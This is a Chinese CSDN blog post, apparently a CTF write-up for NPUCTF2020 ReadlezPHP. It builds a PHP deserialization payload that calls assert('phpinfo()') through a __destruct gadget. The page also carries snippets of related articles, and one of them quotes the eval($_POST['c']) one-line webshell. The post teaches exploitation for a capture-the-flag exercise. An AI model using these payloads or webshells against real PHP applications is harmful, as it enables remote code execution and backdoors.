assert()执行phpinfo()之[NPUCTF2020]ReadlezPHP1

最新推荐文章于 2023-08-20 01:47:05 发布
最新推荐文章于 2023-08-20 01:47:05 发布
阅读量289 收藏
点赞数
分类专栏: CTF知识点 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58970968/article/details/126291123
版权

知识点:
反序列化构造:

assert(phpinfo());

什么是assert 

相当于就是if语句:

if(假设成立)
{
     程序正常运行;
}
else
{
      报错&&终止程序!(避免由程序运行引起更大的错误)  
}

如果assert里面的值成立,那么就执行,否则中断程序;

这里

关键代码:

public function __destruct(){
        $a = $this->a;
        $b = $this->b;
        echo $b($a);
    }

 

<?php  

class HelloPhp
{
    public $a;
    public $b;
    public function __construct(){
        $this->a = "phpinfo()";
        $this->b = "assert";
    }
}

$a = serialize(new HelloPhp);
echo $a;
?> 
结果:O:8:"HelloPhp":2:{s:1:"a";s:9:"phpinfo()";s:1:"b";s:6:"assert";}

就可以使用assert(phpinfo());

一只Traveler
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
常见代码执行函数
L_lemo004的博客
07-12 6142
常见代码执行函数,如 eval() assert() preg_replace() create_function() array_map() call_user_func() call_user_func_array() array_filter usort uasort() 文件操作函数 动态函数(a(a(a(b)) 1、eval() eval() 函数把字...
phpinfo 命令执行函数被禁用绕过tips
yggcwhat
06-02 1573
phpinfo 命令执行函数被禁用绕过tips
PHP assert 和 eval
Miss Dan的博客
03-14 3151
assert 判断一个表达式是否成立。返回true or false; &lt;?php $s = 123; assert("is_int($s)"); ?&gt; 从这个例子可以看到字符串参数会被执行,这跟eval()类似。 不过eval($code_str)只是执行符合php编码规范的$code_str。 eval():该函数对于在数据库文本字段中供日后计算而进行的代码存储很有用。(在...
构造不包含字母和数字的webshell
weixin_54347738的博客
08-20 155
assert(eval())是可以的,assert执行了eval函数。这里面1提交过去的是字符串,assert函数无法执行字符串。异或的二进制的值是00100001,对应的ASCII值是33,对应的字符串的值就是!第二行中,ascii码,>的大于
从实战理解代码执行漏洞函数(php
weixin_51692662的博客
08-18 772
php,RCE,漏洞,远程代码,安全,代码执行
Java陷阱之assert关键字
01-20
 在Java中,assert关键字是从JAVA SE 1.4 引入的,为了避免和老版本的Java代码中使用了assert关键字导致错误,Java在执行的时候默认是不启动断言检查的(这个时候,所有的断言语句都将忽略!),如果要开启断言...
Java陷阱之assert关键字详解
09-05
详细介绍了Java陷阱之assert关键字,有需要的朋友可以参考一下
Node.js API详解之 assert模块用法实例分析
10-15
assert.equal(1, '1'); // 测试通过,1 == '1'的类型转换结果 assert.equal(1, 2); // 抛出 AssertionError: 1 == 2 ``` 而`assert.deepEqual()`用于深度比较两个值是否相等,但只测试可枚举的自身属性,不考虑原型...
node.js学习之断言assert的使用示例
10-19
assert 模块主要用于编写程序的单元测试时使用,通过断言可以提早发现和排查出错误。下面这篇文章主要给大家介绍了关于node.js学习之断言assert的相关资料,需要的朋友可以参考借鉴,下面随着小编来一起学习学习吧。
php 访问phpinfo,PHP无法执行 phpinfo()
weixin_39958019的博客
03-10 1077
问题现象:安装完毕PHP之后,执行phpinfo() 发现页面无法打开查看apache的error.log信息,发现报错:[Sun Apr 25 13:40:37 2010] [error] [client 192.168.0.145] PHP Warning:phpinfo() has been disabled for security reasons in /usr/local/apach...
PHP第一条代码笔记
weixin_30617797的博客
03-30 212
php的代码部份全部要用半角的英文、很多人容易写成全角的英文和符号造成PHP代码报错。 PHP代码的最后一行可以加也可不加分号。由于很多学习者特别是初学者经常犯一个毛病:写完一行代码不加分号。因此,容易报错。我们通常在公司里面规定:一行代码写完,就必须要加分号。 PHP还可以有简洁声明模式,我们在这个阶段以代码练习为主。关于环境配置问题,暂时不建议学习。在后面的章节中,...
assert()函数_Web渗透 之 PHP 函数
weixin_39711721的博客
12-28 550
后台代码 - PHP 函数函数就是可以完成固定功能的语句或语句集合,可以重复调用。0x01 自定义函数函数定义的语法function 函数名([形式参数1,形式参数2,....形式参数n]){ //函数体 return 表达式;//也可以不返回,如果不写那么默认返回null } function 是PHP 的关键字,用于完成函数的定义函数名,避开PHP 关键字,命名规则与变量的命名...
浅谈ctf中phpinfo需要关注的点
weixin_44255856的博客
08-27 1416
首先我们先谈谈 php各个版本的的差异 php5.2以前 __autoload()加载类文件,但只能调用一次这个函数,所以可以用spl_autoload_register()加载类 关于 __autoload()函数,如果定义了该函数,该代码就会被调用 关于spl_autoload_register()函数:注册给定的函数作为 __autoload 的实现 当出现未定义的类时,标准PHP库会...
一句话后门中eval和assert的区别
热门推荐
whatday的专栏
03-01 1万+
eval函数中参数是字符,如: eval('echo 1;'); assert函数中参数为表达式 (或者为函数),如: assert(phpinfo()) assert(eval('echo 1;')); 直接传递普通代码是无法执行的,如:assert('echo 1;'); 下面这个代码执行不了: @array_map("eval",arra
php assert执行命令,代码执行&命令执行&命令注入
weixin_33962315的博客
03-19 1985
代码执行&命令执行&命令注入代码执行代码执行是靠脚本代码调用操作系统的命令evaleval( string $code) : mixed把字符串 code 作为PHP代码执行。eval($_POST['c']);直接蚁剑链接密码为c 中国菜刀 cknifeassertassert( mixedexception]) : bool如果 assertion 是字符串,它将会被 ass...
php 断言,PHP 断言(assert) 详解
weixin_31180441的博客
03-12 2124
PHP 中的断言常用于调试,检查一个表达式或语句是否为 FALSE。本文带你重新认识 PHP assert() 函数的神(Qi)通(Yin)广(Ji)大(Qiao)。本文基于 PHP Version 7.1.28什么是断言编写程序时,常会做出一定的假设,那断言就是用来捕获假设的异常,我们也可以认为断言是异常的一种特殊形式。断言一般用于程序执行结构的判断,不可让断言处理业务流程。用的最多的场景就是单...
[NPUCTF2020]ReadlezPHP
姜小孩的博客
04-25 2204
[NPUCTF2020]ReadlezPHP BUU 刷题
sv中assert执行
最新发布
10-22
如果你想要assert语句不执行,可以使用disable语句来禁用它。例如: ``` initial begin disable my_assert; end assert my_assert: (a == b); ``` 在这个例子中,我们使用disable语句来禁用名为my_assert的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值